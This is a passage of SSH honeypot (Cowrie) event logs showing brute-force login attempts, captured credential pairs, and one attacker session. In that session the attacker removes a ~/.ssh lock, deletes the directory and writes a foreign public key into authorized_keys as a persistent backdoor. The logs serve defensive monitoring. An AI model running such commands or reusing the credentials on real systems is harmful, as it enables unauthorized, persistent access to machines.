{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T02:40:21.688065Z","src_ip":"212.227.235.229","session":"52f63b1affe4"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T02:40:21.945901Z","src_ip":"212.227.235.229","session":"52f63b1affe4"}
{"eventid":"cowrie.login.success","username":"root","password":"3245gs5662d34","message":"login attempt [root/3245gs5662d34] succeeded","sensor":"my-vps","timestamp":"2025-09-09T02:40:22.962239Z","src_ip":"212.227.235.229","session":"52f63b1affe4"}
{"eventid":"cowrie.session.closed","duration":"7.5","message":"Connection lost after 7.5 seconds","sensor":"my-vps","timestamp":"2025-09-09T02:40:23.216465Z","src_ip":"212.227.235.229","session":"bcd865be3ff1"}
{"eventid":"cowrie.session.closed","duration":"1.5","message":"Connection lost after 1.5 seconds","sensor":"my-vps","timestamp":"2025-09-09T02:40:23.220788Z","src_ip":"212.227.235.229","session":"52f63b1affe4"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":49016,"dst_ip":"1.2.3.4","dst_port":22,"session":"60f5d4e4243d","protocol":"ssh","message":"New connection: 212.227.235.229:49016 (1.2.3.4:22) [session: 60f5d4e4243d]","sensor":"my-vps","timestamp":"2025-09-09T02:40:29.429486Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T02:40:29.430302Z","src_ip":"212.227.235.229","session":"60f5d4e4243d"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T02:40:29.725545Z","src_ip":"212.227.235.229","session":"60f5d4e4243d"}
{"eventid":"cowrie.login.failed","username":"ubuntu","password":"Welcome1","message":"login attempt [ubuntu/Welcome1] failed","sensor":"my-vps","timestamp":"2025-09-09T02:40:30.909141Z","src_ip":"212.227.235.229","session":"60f5d4e4243d"}
{"eventid":"cowrie.session.closed","duration":"2.8","message":"Connection lost after 2.8 seconds","sensor":"my-vps","timestamp":"2025-09-09T02:40:32.208869Z","src_ip":"212.227.235.229","session":"60f5d4e4243d"}
{"eventid":"cowrie.session.closed","duration":12.627450704574585,"message":"Connection lost after 12 seconds","sensor":"my-vps","timestamp":"2025-09-09T02:40:32.503135Z","src_ip":"212.227.235.229","session":"971a1ce96e7e"}
{"eventid":"cowrie.session.connect","src_ip":"185.152.45.241","src_port":11791,"dst_ip":"1.2.3.4","dst_port":22,"session":"8d84d2702c3b","protocol":"ssh","message":"New connection: 185.152.45.241:11791 (1.2.3.4:22) [session: 8d84d2702c3b]","sensor":"my-vps","timestamp":"2025-09-09T02:40:57.816583Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T02:40:57.822285Z","src_ip":"185.152.45.241","session":"8d84d2702c3b"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T02:40:57.888923Z","src_ip":"185.152.45.241","session":"8d84d2702c3b"}
{"eventid":"cowrie.login.failed","username":"share","password":"share","message":"login attempt [share/share] failed","sensor":"my-vps","timestamp":"2025-09-09T02:40:58.154488Z","src_ip":"185.152.45.241","session":"8d84d2702c3b"}
{"eventid":"cowrie.session.closed","duration":"1.4","message":"Connection lost after 1.4 seconds","sensor":"my-vps","timestamp":"2025-09-09T02:40:59.208795Z","src_ip":"185.152.45.241","session":"8d84d2702c3b"}
{"eventid":"cowrie.session.connect","src_ip":"203.195.82.54","src_port":33732,"dst_ip":"1.2.3.4","dst_port":22,"session":"54e6b79dc3a8","protocol":"ssh","message":"New connection: 203.195.82.54:33732 (1.2.3.4:22) [session: 54e6b79dc3a8]","sensor":"my-vps","timestamp":"2025-09-09T02:41:11.603071Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-09-09T02:41:11.604721Z","src_ip":"203.195.82.54","session":"54e6b79dc3a8"}
{"eventid":"cowrie.client.kex","hassh":"084386fa7ae5039bcf6f07298a05a227","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,arcfour256,arcfour128,aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,arcfour256,arcfour128;hmac-sha2-256,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1"],"keyAlgs":["ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-rsa","ssh-dss","ssh-ed25519","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","arcfour256","arcfour128","aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","arcfour256","arcfour128"],"macCS":["hmac-sha2-256","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 084386fa7ae5039bcf6f07298a05a227","sensor":"my-vps","timestamp":"2025-09-09T02:41:11.838437Z","src_ip":"203.195.82.54","session":"54e6b79dc3a8"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":41348,"dst_ip":"1.2.3.4","dst_port":22,"session":"e061d9b31847","protocol":"ssh","message":"New connection: 212.227.235.229:41348 (1.2.3.4:22) [session: e061d9b31847]","sensor":"my-vps","timestamp":"2025-09-09T02:41:14.353918Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T02:41:14.361922Z","src_ip":"212.227.235.229","session":"e061d9b31847"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T02:41:14.741199Z","src_ip":"212.227.235.229","session":"e061d9b31847"}
{"eventid":"cowrie.login.success","username":"root","password":"Qwer4321","message":"login attempt [root/Qwer4321] succeeded","sensor":"my-vps","timestamp":"2025-09-09T02:41:16.271015Z","src_ip":"212.227.235.229","session":"e061d9b31847"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T02:41:17.100607Z","src_ip":"212.227.235.229","session":"e061d9b31847"}
{"eventid":"cowrie.command.input","input":"cd ~; chattr -ia .ssh; lockr -ia .ssh","message":"CMD: cd ~; chattr -ia .ssh; lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-09-09T02:41:17.101332Z","src_ip":"212.227.235.229","session":"e061d9b31847"}
{"eventid":"cowrie.command.failed","input":"lockr -ia .ssh","message":"Command not found: lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-09-09T02:41:17.102154Z","src_ip":"212.227.235.229","session":"e061d9b31847"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","size":32,"shasum":"c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","duplicate":true,"duration":"0.4","message":"Closing TTY Log: var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644 after 0.4 seconds","sensor":"my-vps","timestamp":"2025-09-09T02:41:17.489122Z","src_ip":"212.227.235.229","session":"e061d9b31847"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T02:41:18.268282Z","src_ip":"212.227.235.229","session":"e061d9b31847"}
{"eventid":"cowrie.command.input","input":"cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","message":"CMD: cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","sensor":"my-vps","timestamp":"2025-09-09T02:41:18.268959Z","src_ip":"212.227.235.229","session":"e061d9b31847"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","shasum":"a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","destfile":"/root/.ssh/authorized_keys","message":"Saved redir contents with SHA-256 a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2 to var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","sensor":"my-vps","timestamp":"2025-09-09T02:41:18.660949Z","src_ip":"212.227.235.229","session":"e061d9b31847"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","size":0,"shasum":"cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","duplicate":true,"duration":"0.4","message":"Closing TTY Log: var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f after 0.4 seconds","sensor":"my-vps","timestamp":"2025-09-09T02:41:18.661793Z","src_ip":"212.227.235.229","session":"e061d9b31847"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":43198,"dst_ip":"1.2.3.4","dst_port":22,"session":"a22ccb2848c6","protocol":"ssh","message":"New connection: 212.227.235.229:43198 (1.2.3.4:22) [session: a22ccb2848c6]","sensor":"my-vps","timestamp":"2025-09-09T02:41:19.057815Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T02:41:19.066046Z","src_ip":"212.227.235.229","session":"a22ccb2848c6"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T02:41:19.457240Z","src_ip":"212.227.235.229","session":"a22ccb2848c6"}
{"eventid":"cowrie.session.closed","duration":"8.0","message":"Connection lost after 8.0 seconds","sensor":"my-vps","timestamp":"2025-09-09T02:41:19.603264Z","src_ip":"203.195.82.54","session":"54e6b79dc3a8"}
{"eventid":"cowrie.login.failed","username":"345gs5662d34","password":"345gs5662d34","message":"login attempt [345gs5662d34/345gs5662d34] failed","sensor":"my-vps","timestamp":"2025-09-09T02:41:21.028560Z","src_ip":"212.227.235.229","session":"a22ccb2848c6"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":35031,"dst_ip":"1.2.3.4","dst_port":22,"session":"99fcd6ac94c2","protocol":"ssh","message":"New connection: 212.227.235.229:35031 (1.2.3.4:22) [session: 99fcd6ac94c2]","sensor":"my-vps","timestamp":"2025-09-09T02:41:21.790512Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T02:41:21.792654Z","src_ip":"212.227.235.229","session":"99fcd6ac94c2"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T02:41:22.042166Z","src_ip":"212.227.235.229","session":"99fcd6ac94c2"}
{"eventid":"cowrie.session.closed","duration":"3.4","message":"Connection lost after 3.4 seconds","sensor":"my-vps","timestamp":"2025-09-09T02:41:22.422916Z","src_ip":"212.227.235.229","session":"a22ccb2848c6"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":44772,"dst_ip":"1.2.3.4","dst_port":22,"session":"134f8d561513","protocol":"ssh","message":"New connection: 212.227.235.229:44772 (1.2.3.4:22) [session: 134f8d561513]","sensor":"my-vps","timestamp":"2025-09-09T02:41:22.781406Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T02:41:22.786571Z","src_ip":"212.227.235.229","session":"134f8d561513"}
{"eventid":"cowrie.login.failed","username":"minerstat","password":"Password","message":"login attempt [minerstat/Password] failed","sensor":"my-vps","timestamp":"2025-09-09T02:41:23.043409Z","src_ip":"212.227.235.229","session":"99fcd6ac94c2"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T02:41:23.160880Z","src_ip":"212.227.235.229","session":"134f8d561513"}
{"eventid":"cowrie.session.closed","duration":"2.5","message":"Connection lost after 2.5 seconds","sensor":"my-vps","timestamp":"2025-09-09T02:41:24.300901Z","src_ip":"212.227.235.229","session":"99fcd6ac94c2"}
{"eventid":"cowrie.login.success","username":"root","password":"3245gs5662d34","message":"login attempt [root/3245gs5662d34] succeeded","sensor":"my-vps","timestamp":"2025-09-09T02:41:24.677746Z","src_ip":"212.227.235.229","session":"134f8d561513"}
{"eventid":"cowrie.session.closed","duration":"2.3","message":"Connection lost after 2.3 seconds","sensor":"my-vps","timestamp":"2025-09-09T02:41:25.052315Z","src_ip":"212.227.235.229","session":"134f8d561513"}
{"eventid":"cowrie.session.closed","duration":"10.7","message":"Connection lost after 10.7 seconds","sensor":"my-vps","timestamp":"2025-09-09T02:41:25.059493Z","src_ip":"212.227.235.229","session":"e061d9b31847"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":60416,"dst_ip":"1.2.3.4","dst_port":23,"session":"6cfb593576ce","protocol":"telnet","message":"New connection: 212.227.235.229:60416 (1.2.3.4:23) [session: 6cfb593576ce]","sensor":"my-vps","timestamp":"2025-09-09T02:41:27.697737Z"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":46098,"dst_ip":"1.2.3.4","dst_port":22,"session":"af1f77ce6f87","protocol":"ssh","message":"New connection: 212.227.235.229:46098 (1.2.3.4:22) [session: af1f77ce6f87]","sensor":"my-vps","timestamp":"2025-09-09T02:41:33.655977Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T02:41:33.656860Z","src_ip":"212.227.235.229","session":"af1f77ce6f87"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly13